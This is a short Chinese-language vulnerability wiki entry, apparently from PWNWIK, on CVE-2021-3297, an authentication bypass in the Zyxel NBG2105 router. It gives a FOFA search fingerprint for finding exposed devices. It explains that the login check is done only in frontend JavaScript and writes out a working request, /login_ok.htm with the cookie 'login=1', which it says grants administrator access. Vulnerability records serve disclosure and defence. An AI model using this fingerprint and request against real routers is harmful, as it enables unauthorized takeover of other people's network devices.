◆◆0 CVE-2021-3297 Zyxel NBG2105 身份验证绕过漏洞/zh-hant PWNWIK.COM , 漏洞影响 Zyxel NBG2105 FOFA app="ZyXEL-NBG2105" 其中前端文件 /js/util_gw.js 存在前端对 Cookie login参数的校验。 请求如下则会以管理员身份跳转到 home.htm页面。 http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1; 免费、自由、人人可编辑的漏洞库 上一篇: CVE-2021-3297 Zyxel NBG2105 身份验证绕过漏洞/es 下一篇: CVE-2021-3317 Klog Server 2.4.1 命令注入漏洞